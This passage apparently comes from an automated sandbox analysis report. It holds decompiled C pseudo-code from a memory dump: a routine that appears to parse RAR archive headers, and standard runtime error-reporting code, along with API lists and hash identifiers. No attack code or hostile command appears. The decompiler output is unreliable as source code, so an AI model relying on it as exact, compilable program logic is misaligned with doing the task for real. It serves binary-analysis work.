                											__eflags = 1;
                											L120:
                											 *((char*)(_t518 + 0x6cb8)) = _t356;
                											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
                											_t549 = _t547 >> 0x00000004 & 0x00000001;
                											__eflags = _t549;
                											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
                											 *(_t518 + 0x6cba) = _t549;
                											L121:
                											_t655 = 7;
                											L122:
                											_t363 = E00CAC34F(_t698 + 0x24, 0);
                											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
                											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
                												L132:
                												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
                												goto L133;
                											}
                											_t368 =  *(_t518 + 0x21e8);
                											__eflags = _t368 - 0x79;
                											if(_t368 == 0x79) {
                												goto L132;
                											}
                											__eflags = _t368 - 0x76;
                											if(_t368 == 0x76) {
                												goto L132;
                											}
                											__eflags = _t368 - 5;
                											if(_t368 != 5) {
                												L130:
                												 *((char*)(_t518 + 0x6cc4)) = 1;
                												E00CA6E03(0xce00e0, 3);
                												__eflags =  *((char*)(_t698 + 0x5f));
                												if(__eflags == 0) {
                													goto L132;
                												}
                												E00CA6BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
                												 *((char*)(_t518 + 0x6cc5)) = 1;
                												goto L133;
                											}
                											__eflags =  *(_t518 + 0x45ae);
                											if( *(_t518 + 0x45ae) == 0) {
                												goto L130;
                											}
                											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
                											__eflags = _t374;
                											asm("sbb edx, ecx");
                											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
                											 *(_t698 + 0x5e) = 1;
                											do {
                												_t376 = E00CA972B(_t518);
                												asm("sbb al, al");
                												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
                												 *(_t698 + 0x5e) = _t379;
                												_t655 = _t655 - 1;
                												__eflags = _t655;
                											} while (_t655 != 0);
                											__eflags = _t379;
                											if(_t379 != 0) {
                												goto L132;
                											}
                											goto L130;
                										}
                										_t356 = 0;
                										__eflags =  *(_t518 + 0x221c);
                										if( *(_t518 + 0x221c) == 0) {
                											goto L120;
                										}
                										goto L119;
                									}
                									if(__eflags <= 0) {
                										L115:
                										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
                										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
                											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E00CAC29E(_t698 + 0x24);
                											asm("adc dword [ebx+0x6cac], 0x0");
                										}
                										goto L122;
                									}
                									__eflags = _t536 - 3;
                									if(_t536 <= 3) {
                										__eflags = _t536 - 2;
                										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
                										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
                										 *(_t698 + 0x48) = _t663;
                										E00CAA8D2(_t663, 0);
                										_t560 = 5;
                										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
                										_t685 =  *(_t698 + 0x48);
                										_t666 =  *(_t698 + 0x50);
                										_t562 =  *(_t685 + 8);
                										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
                										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
                										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
                										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
                										__eflags = _t666 - 2;
                										if(_t666 != 2) {
                											L35:
                											_t641 = 0;
                											__eflags = 0;
                											_t396 = 0;
                											L36:
                											 *((char*)(_t685 + 0x10f0)) = _t396;
                											__eflags = _t666 - 2;
                											if(_t666 == 2) {
                												L39:
                												_t397 = _t641;
                												L40:
                												 *(_t685 + 0x10fa) = _t397;
                												_t563 = _t562 & 0x000000e0;
                												__eflags = _t563 - 0xe0;
                												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
                												__eflags = _t563 - 0xe0;
                												if(_t563 != 0xe0) {
                													_t642 =  *(_t685 + 8);
                													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
                													__eflags = 0x10000;
                												} else {
                													_t401 = _t641;
                													_t642 =  *(_t685 + 8);
                												}
                												 *(_t685 + 0x10f4) = _t401;
                												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
                												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
                												 *((intOrPtr*)(_t685 + 0x14)) = E00CAC29E(_t698 + 0x24);
                												 *(_t698 + 0x54) = E00CAC29E(_t698 + 0x24);
                												 *((char*)(_t685 + 0x18)) = E00CAC251(_t698 + 0x24);
                												 *(_t685 + 0x1070) = 2;
                												 *((intOrPtr*)(_t685 + 0x1074)) = E00CAC29E(_t698 + 0x24);
                												 *(_t698 + 0x18) = E00CAC29E(_t698 + 0x24);
                												 *(_t685 + 0x1c) = E00CAC251(_t698 + 0x24) & 0x000000ff;
                												 *((char*)(_t685 + 0x20)) = E00CAC251(_t698 + 0x24) - 0x30;
                												 *(_t698 + 0x4c) = E00CAC269(_t698 + 0x24) & 0x0000ffff;
                												_t415 = E00CAC29E(_t698 + 0x24);
                												_t645 =  *(_t685 + 0x1c);
                												 *(_t698 + 0x58) = _t415;
                												 *(_t685 + 0x24) = _t415;
                												__eflags = _t645 - 0x14;
                												if(_t645 < 0x14) {
                													__eflags = _t415 & 0x00000010;
                													if((_t415 & 0x00000010) != 0) {
                														 *((char*)(_t685 + 0x10f1)) = 1;
                													}
                												}
                												 *(_t685 + 0x109c) = 0;
                												__eflags =  *(_t685 + 0x109b);
                												if( *(_t685 + 0x109b) == 0) {
                													L55:
                													_t416 =  *((intOrPtr*)(_t685 + 0x18));
                													 *(_t685 + 0x10fc) = 2;
                													__eflags = _t416 - 3;
                													if(_t416 == 3) {
                														L59:
                														 *(_t685 + 0x10fc) = 1;
                														L60:
                														 *(_t685 + 0x1100) = 0;
                														__eflags = _t416 - 3;
                														if(_t416 == 3) {
                															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
                															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
                																__eflags = 0;
                																 *(_t685 + 0x1100) = 1;
                																 *((short*)(_t685 + 0x1104)) = 0;
                															}
                														}
                														__eflags = _t666 - 2;
                														if(_t666 == 2) {
                															L66:
                															_t417 = 0;
                															goto L67;
                														} else {
                															__eflags =  *(_t685 + 0x24);
                															if( *(_t685 + 0x24) >= 0) {
                																goto L66;
                															}
                															_t417 = 1;
                															L67:
                															 *((char*)(_t685 + 0x10f8)) = _t417;
                															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
                															__eflags = _t420;
                															 *(_t685 + 0x10f9) = _t420;
                															if(_t420 == 0) {
                																__eflags =  *(_t698 + 0x54) - 0xffffffff;
                																_t638 = 0;
                																_t667 = 0;
                																_t137 =  *(_t698 + 0x54) == 0xffffffff;
                																__eflags = _t137;
                																_t421 = _t420 & 0xffffff00 | _t137;
                																L73:
                																 *(_t685 + 0x109a) = _t421;
                																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
                																asm("adc edi, ecx");
                																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
                																asm("adc edx, ecx");
                																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
                																__eflags =  *(_t685 + 0x109a);
                																 *(_t685 + 0x1064) = _t638;
                																if( *(_t685 + 0x109a) != 0) {
                																	 *(_t685 + 0x1060) = 0x7fffffff;
                																	 *(_t685 + 0x1064) = 0x7fffffff;
                																}
                																_t426 =  *(_t698 + 0x4c);
                																_t668 = 0x1fff;
                																 *(_t698 + 0x54) = 0x1fff;
                																__eflags = _t426 - 0x1fff;
                																if(_t426 < 0x1fff) {
                																	_t668 = _t426;
                																	 *(_t698 + 0x54) = _t426;
                																}
                																E00CAC300(_t698 + 0x24, _t698 - 0x2030, _t668);
                																_t429 = 0;
                																__eflags =  *(_t698 + 0x50) - 2;
                																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
                																if( *(_t698 + 0x50) != 2) {
                																	 *(_t698 + 0x50) = _t685 + 0x28;
                																	_t432 = E00CB0FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
                																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
                																	__eflags =  *(_t685 + 8) & 0x00000400;
                																	if(( *(_t685 + 8) & 0x00000400) != 0) {
                																		_t671 = _t671 - 8;
                																		__eflags = _t671;
                																	}
                																	__eflags = _t671;
                																	if(_t671 <= 0) {
                																		_t672 = _t685 + 0x28;
                																	} else {
                																		 *(_t698 + 0x58) = _t685 + 0x1028;
                																		E00CA1EDE(_t685 + 0x1028, _t671);
                																		_t466 = E00CAC300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
                																		_t672 = _t685 + 0x28;
                																		_t432 = E00CC2B69(_t466, _t685 + 0x28, L"RR");
                																		__eflags = _t432;
                																		if(_t432 == 0) {
                																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
                																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
                																				_t673 =  *( *(_t698 + 0x58));
                																				asm("cdq");
                																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
                																				asm("cdq");
                																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
                																				asm("adc esi, edx");
                																				asm("cdq");
                																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
                																				asm("adc esi, edx");
                																				asm("cdq");
                																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
                																				asm("adc esi, edx");
                																				 *(_t518 + 0x21c0) = _t472 << 9;
                																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
                																				_t476 = E00CAF749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
                																				 *(_t518 + 0x21c8) = _t476;
                																				 *(_t698 + 0x58) = _t476;
                																				_t477 = E00CBD890(_t475, _t638, 0xc8, 0);
                																				asm("adc edx, [ebx+0x21c4]");
                																				_t432 = E00CAF749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
                																				_t612 =  *(_t698 + 0x58);
                																				_t685 =  *(_t698 + 0x48);
                																				_t672 =  *(_t698 + 0x50);
                																				__eflags = _t432 - _t612;
                																				if(_t432 > _t612) {
                																					_t432 = _t612 + 1;
                																					 *(_t518 + 0x21c8) = _t612 + 1;
                																				}
                																			}
                																		}
                																	}
                																	_t433 = E00CC2B69(_t432, _t672, L"CMT");
                																	__eflags = _t433;
                																	if(_t433 == 0) {
                																		 *((char*)(_t518 + 0x6cb6)) = 1;
                																	}
                																} else {
                																	_t672 = _t685 + 0x28;
                																	 *_t672 = 0;
                																	__eflags =  *(_t685 + 8) & 0x00000200;
                																	if(( *(_t685 + 8) & 0x00000200) != 0) {
                																		E00CA69E0(_t698);
                																		_t484 = E00CC2BB0(_t698 - 0x2030);
                																		_t638 =  *(_t698 + 0x54);
                																		_t485 = _t484 + 1;
                																		__eflags = _t638 - _t485;
                																		if(_t638 > _t485) {
                																			__eflags = _t485 + _t698 - 0x2030;
                																			E00CA69F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
                																		}
                																		_t429 = 0;
                																		__eflags = 0;
                																	}
                																	__eflags =  *_t672 - _t429;
                																	if( *_t672 == _t429) {
                																		_push(1);
                																		_push(0x800);
                																		_push(_t672);
                																		_push(_t698 - 0x2030);
                																		E00CAF79F();
                																	}
                																	E00CA1F3D(_t518, _t685);
                																}
                																__eflags =  *(_t685 + 8) & 0x00000400;
                																if(( *(_t685 + 8) & 0x00000400) != 0) {
                																	E00CAC300(_t698 + 0x24, _t685 + 0x10a1, 8);
                																}
                																E00CB08B2( *(_t698 + 0x18));
                																__eflags =  *(_t685 + 8) & 0x00001000;
                																if(( *(_t685 + 8) & 0x00001000) == 0) {
                																	L112:
                																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00CA3CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
                																	 *(_t518 + 0x6cac) = _t638;
                																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
                																	_t438 = E00CAC34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
                																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
                																	if( *_t685 != (_t438 & 0x0000ffff)) {
                																		 *((char*)(_t518 + 0x6cc4)) = 1;
                																		E00CA6E03(0xce00e0, 1);
                																		__eflags =  *((char*)(_t698 + 0x5f));
                																		if(__eflags == 0) {
                																			E00CA6BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
                																		}
                																	}
                																	goto L121;
                																} else {
                																	_t443 = E00CAC269(_t698 + 0x24);
                																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
                																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
                																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
                																	__eflags = 0;
                																	_t686 = 0;
                																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
                																	_t448 = _t443 & 0x0000ffff;
                																	 *(_t698 + 0x4c) = 0;
                																	 *(_t698 + 0x58) = _t448;
                																	do {
                																		_t586 = 3;
                																		_t521 = _t448 >> _t586 - _t686 << 2;
                																		__eflags = _t521 & 0x00000008;
                																		if((_t521 & 0x00000008) == 0) {
                																			goto L110;
                																		}
                																		__eflags =  *(_t698 + 4 + _t686 * 4);
                																		if( *(_t698 + 4 + _t686 * 4) == 0) {
                																			goto L110;
                																		}
                																		__eflags = _t686;
                																		if(__eflags != 0) {
                																			E00CB08B2(E00CAC29E(_t698 + 0x24));
                																		}
                																		E00CB06E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
                																		__eflags = _t521 & 0x00000004;
                																		if((_t521 & 0x00000004) != 0) {
                																			_t249 = _t698 - 0x1c;
                																			 *_t249 =  *(_t698 - 0x1c) + 1;
                																			__eflags =  *_t249;
                																		}
                																		_t590 = 0;
                																		 *(_t698 - 0x18) = 0;
                																		_t522 = _t521 & 0x00000003;
                																		__eflags = _t522;
                																		if(_t522 <= 0) {
                																			L109:
                																			_t451 = _t590 * 0x64;
                																			__eflags = _t451;
                																			 *(_t698 - 0x18) = _t451;
                																			E00CB0910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
                																			_t448 =  *(_t698 + 0x58);
                																		} else {
                																			_t454 = 3;
                																			_t456 = _t454 - _t522 << 3;
                																			__eflags = _t456;
                																			 *(_t698 + 0x18) = _t456;
                																			_t687 = _t456;
                																			do {
                																				_t459 = (E00CAC251(_t698 + 0x24) & 0x000000ff) << _t687;
                																				_t687 = _t687 + 8;
                																				_t590 =  *(_t698 - 0x18) | _t459;
                																				 *(_t698 - 0x18) = _t590;
                																				_t522 = _t522 - 1;
                																				__eflags = _t522;
                																			} while (_t522 != 0);
                																			_t686 =  *(_t698 + 0x4c);
                																			goto L109;
                																		}
                																		L110:
                																		_t686 = _t686 + 1;
                																		 *(_t698 + 0x4c) = _t686;
                																		__eflags = _t686 - 4;
                																	} while (_t686 < 4);
                																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
                																	_t685 =  *(_t698 + 0x48);
                																	goto L112;
                																}
                															}
                															_t667 = E00CAC29E(_t698 + 0x24);
                															_t491 = E00CAC29E(_t698 + 0x24);
                															__eflags =  *(_t698 + 0x54) - 0xffffffff;
                															_t638 = _t491;
                															if( *(_t698 + 0x54) != 0xffffffff) {
                																L71:
                																_t421 = 0;
                																goto L73;
                															}
                															__eflags = _t638 - 0xffffffff;
                															if(_t638 != 0xffffffff) {
                																goto L71;
                															}
                															_t421 = 1;
                															goto L73;
                														}
                													}
                													__eflags = _t416 - 5;
                													if(_t416 == 5) {
                														goto L59;
                													}
                													__eflags = _t416 - 6;
                													if(_t416 < 6) {
                														 *(_t685 + 0x10fc) = 0;
                													}
                													goto L60;
                												} else {
                													_t646 = _t645 - 0xd;
                													__eflags = _t646;
                													if(_t646 == 0) {
                														 *(_t685 + 0x109c) = 1;
                														goto L55;
                													}
                													_t648 = _t646;
                													__eflags = _t648;
                													if(_t648 == 0) {
                														 *(_t685 + 0x109c) = 2;
                														goto L55;
                													}
                													_t649 = _t648 - 5;
                													__eflags = _t649;
                													if(_t649 == 0) {
                														L52:
                														 *(_t685 + 0x109c) = 3;
                														goto L55;
                													}
                													__eflags = _t649 == 6;
                													if(_t649 == 6) {
                														goto L52;
                													}
                													 *(_t685 + 0x109c) = 4;
                													goto L55;
                												}
                											}
                											__eflags = _t562 & 0x00000010;
                											if((_t562 & 0x00000010) == 0) {
                												goto L39;
                											}
                											_t397 = 1;
                											goto L40;
                										}
                										__eflags = _t562 & 0x00000010;
                										if((_t562 & 0x00000010) == 0) {
                											goto L35;
                										} else {
                											_t396 = 1;
                											_t641 = 0;
                											goto L36;
                										}
                									}
                									__eflags = _t536 - 5;
                									if(_t536 != 5) {
                										goto L115;
                									} else {
                										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
                										_t651 =  *(_t518 + 0x4598);
                										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
                										_t628 = _t651 >> 0x00000001 & 0x00000001;
                										_t638 = _t651 >> 0x00000003 & 0x00000001;
                										 *(_t518 + 0x45ad) = _t628;
                										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
                										 *(_t518 + 0x45af) = _t638;
                										__eflags = _t628;
                										if(_t628 != 0) {
                											 *((intOrPtr*)(_t518 + 0x45a4)) = E00CAC29E(_t698 + 0x24);
                										}
                										__eflags =  *(_t518 + 0x45af);
                										if( *(_t518 + 0x45af) != 0) {
                											_t505 = E00CAC269(_t698 + 0x24) & 0x0000ffff;
                											 *(_t518 + 0x45a8) = _t505;
                											 *(_t518 + 0x6cd8) = _t505;
                										}
                										goto L121;
                									}
                								}
                								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
                								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
                									goto L20;
                								}
                								goto L23;
                							}
                							L20:
                							_push(6);
                							goto L24;
                						} else {
                							E00CA1EF8(_t518);
                							L133:
                							E00CA159C(_t698 + 0x24);
                							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
                							return  *((intOrPtr*)(_t698 + 0x1c));
                						}
                					}
                					L8:
                					E00CA3DAB(_t518, _t638);
                					goto L133;
                				}
                				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
                				asm("adc eax, ecx");
                				_t707 =  *(_t518 + 0x6ca4);
                				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
                					goto L6;
                				} else {
                					 *((char*)(_t698 + 0x5f)) = 1;
                					E00CA3C40(_t518);
                					_push(8);
                					_push(_t698 + 0x14);
                					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
                						goto L8;
                					} else {
                						_t697 = _t518 + 0x1024;
                						E00CA607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
                						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
                						goto L7;
                					}
                				}
                			}

                0x00ca2dc1
                0x00ca2dc8
                0x00ca2dd6
                0x00ca2dd6
                0x00ca2de4
                0x00ca2de9
                0x00ca2df0
                0x00ca2ed4
                0x00ca2ef5
                0x00ca2efe
                0x00ca2f0a
                0x00ca2f10
                0x00ca2f18
                0x00ca2f1a
                0x00ca2f27
                0x00ca2f2e
                0x00ca2f33
                0x00ca2f37
                0x00ca2f44
                0x00ca2f44
                0x00ca2f37
                0x00000000
                0x00ca2df6
                0x00ca2df9
                0x00ca2e07
                0x00ca2e10
                0x00ca2e19
                0x00ca2e1c
                0x00ca2e1e
                0x00ca2e20
                0x00ca2e23
                0x00ca2e25
                0x00ca2e28
                0x00ca2e2b
                0x00ca2e2d
                0x00ca2e35
                0x00ca2e37
                0x00ca2e3a
                0x00000000
                0x00000000
                0x00ca2e40
                0x00ca2e45
                0x00000000
                0x00000000
                0x00ca2e47
                0x00ca2e49
                0x00ca2e58
                0x00ca2e58
                0x00ca2e65
                0x00ca2e6a
                0x00ca2e6d
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e72
                0x00ca2e74
                0x00ca2e77
                0x00ca2e77
                0x00ca2e7a
                0x00ca2eab
                0x00ca2eab
                0x00ca2eab
                0x00ca2eb2
                0x00ca2eb9
                0x00ca2ebe
                0x00ca2e7c
                0x00ca2e7e
                0x00ca2e81
                0x00ca2e81
                0x00ca2e84
                0x00ca2e87
                0x00ca2e89
                0x00ca2e96
                0x00ca2e98
                0x00ca2e9e
                0x00ca2ea0
                0x00ca2ea3
                0x00ca2ea3
                0x00ca2ea3
                0x00ca2ea8
                0x00000000
                0x00ca2ea8
                0x00ca2ec1
                0x00ca2ec1
                0x00ca2ec2
                0x00ca2ec5
                0x00ca2ec5
                0x00ca2ece
                0x00ca2ed1
                0x00000000
                0x00ca2ed1
                0x00ca2df0
                0x00ca2b5a
                0x00ca2b5c
                0x00ca2b61
                0x00ca2b65
                0x00ca2b67
                0x00ca2b75
                0x00ca2b77
                0x00000000
                0x00ca2b77
                0x00ca2b69
                0x00ca2b6c
                0x00000000
                0x00000000
                0x00ca2b70
                0x00000000
                0x00ca2b71
                0x00ca2b2b
                0x00ca2ae2
                0x00ca2ae4
                0x00000000
                0x00000000
                0x00ca2ae6
                0x00ca2ae8
                0x00ca2aea
                0x00ca2aea
                0x00000000
                0x00ca2a8e
                0x00ca2a8e
                0x00ca2a8e
                0x00ca2a91
                0x00ca2ac7
                0x00000000
                0x00ca2ac7
                0x00ca2a94
                0x00ca2a94
                0x00ca2a97
                0x00ca2abb
                0x00000000
                0x00ca2abb
                0x00ca2a99
                0x00ca2a99
                0x00ca2a9c
                0x00ca2aaf
                0x00ca2aaf
                0x00000000
                0x00ca2aaf
                0x00ca2a9e
                0x00ca2aa1
                0x00000000
                0x00000000
                0x00ca2aa3
                0x00000000
                0x00ca2aa3
                0x00ca2a8c
                0x00ca298c
                0x00ca298f
                0x00000000
                0x00000000
                0x00ca2993
                0x00000000
                0x00ca2993
                0x00ca2972
                0x00ca2975
                0x00000000
                0x00ca2977
                0x00ca2977
                0x00ca2979
                0x00000000
                0x00ca2979
                0x00ca2975
                0x00ca2874
                0x00ca2877
                0x00000000
                0x00ca287d
                0x00ca2889
                0x00ca2891
                0x00ca2899
                0x00ca28a8
                0x00ca28b0
                0x00ca28b3
                0x00ca28b9
                0x00ca28bf
                0x00ca28c5
                0x00ca28c7
                0x00ca28d1
                0x00ca28d1
                0x00ca28d7
                0x00ca28de
                0x00ca28ec
                0x00ca28ef
                0x00ca28f5
                0x00ca28f5
                0x00000000
                0x00ca28de
                0x00ca2877
                0x00ca2814
                0x00ca281b
                0x00000000
                0x00000000
                0x00000000
                0x00ca281b
                0x00ca280b
                0x00ca280b
                0x00000000
                0x00ca27ac
                0x00ca27ae
                0x00ca30df
                0x00ca30e2
                0x00ca30f0
                0x00ca30fb
                0x00ca30fb
                0x00ca27aa
                0x00ca2746
                0x00ca2748
                0x00000000
                0x00ca2748
                0x00ca26d6
                0x00ca26d8
                0x00ca26da
                0x00ca26e0
                0x00000000
                0x00ca26ec
                0x00ca26ee
                0x00ca26f2
                0x00ca26fc
                0x00ca26fe
                0x00ca2707
                0x00000000
                0x00ca2709
                0x00ca2719
                0x00ca272a
                0x00ca272f
                0x00000000
                0x00ca272f
                0x00ca2707

                APIs
                • __EH_prolog.LIBCMT ref: 00CA269B
                • _strlen.LIBCMT ref: 00CA2C1F
                  • Part of subcall function 00CB0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CAB312,00000000,?,?,?,000202DA), ref: 00CB0FFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2D76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 76b04b7a834375c0c01b38f97e6f6aad16fe8805f9f3019a3ac9a73eb95a472e
                • Instruction ID: cda2280d591c7e952eb4a99675e649fd2735a46dc183c992f98db1d4817e0ed7
                • Opcode Fuzzy Hash: 76b04b7a834375c0c01b38f97e6f6aad16fe8805f9f3019a3ac9a73eb95a472e
                • Instruction Fuzzy Hash: 686216715002968FDF28DF78C8957EA37E1EF56308F08457EEC9A8B282D7709A45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00CC7BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v0;
                				signed int _v8;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				void* _v532;
                				intOrPtr _v536;
                				char _v540;
                				intOrPtr _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				intOrPtr _v564;
                				intOrPtr _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				intOrPtr _v580;
                				intOrPtr _v584;
                				char _v724;
                				intOrPtr _v792;
                				intOrPtr _v800;
                				char _v804;
                				intOrPtr _v808;
                				char _v812;
                				signed int _t40;
                				char* _t47;
                				intOrPtr _t49;
                				intOrPtr _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				intOrPtr _t66;
                				int _t67;
                				intOrPtr _t68;
                				signed int _t69;
                
                				_t68 = __esi;
                				_t66 = __edi;
                				_t65 = __edx;
                				_t60 = __ebx;
                				_t40 =  *0xcdd668; // 0x814d2927
                				_t41 = _t40 ^ _t69;
                				_v8 = _t40 ^ _t69;
                				if(_a4 != 0xffffffff) {
                					_push(_a4);
                					E00CBE690(_t41);
                					_pop(_t61);
                				}
                				E00CBE920(_t66,  &_v804, 0, 0x50);
                				E00CBE920(_t66,  &_v724, 0, 0x2cc);
                				_v812 =  &_v804;
                				_t47 =  &_v724;
                				_v808 = _t47;
                				_v548 = _t47;
                				_v552 = _t61;
                				_v556 = _t65;
                				_v560 = _t60;
                				_v564 = _t68;
                				_v568 = _t66;
                				_v524 = ss;
                				_v536 = cs;
                				_v572 = ds;
                				_v576 = es;
                				_v580 = fs;
                				_v584 = gs;
                				asm("pushfd");
                				_pop( *_t22);
                				_v540 = _v0;
                				_t25 =  &_v0; // 0x1b
                				_t49 = _t25;
                				_v528 = _t49;
                				_v724 = 0x10001;
                				_v544 =  *((intOrPtr*)(_t49 - 4));
                				_v804 = _a8;
                				_v800 = _a12;
                				_v792 = _v0;
                				_t67 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(0);
                				_t36 =  &_v812; // -785
                				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                					_push(_a4);
                					_t57 = E00CBE690(_t57);
                				}
                				return E00CBE203(_t57, _v8 ^ _t69);
                			}


                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC7CD9
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC7CE3
                • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00CC7CF0
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 71378ca5d4eae3935a319883fc319aa20027c2412a14101159fceb888f374142
                • Instruction ID: 20865da6bd3984f4750ba583ea739aeca6cce90cb094380f7ca9af9ecb0914ff
                • Opcode Fuzzy Hash: 71378ca5d4eae3935a319883fc319aa20027c2412a14101159fceb888f374142
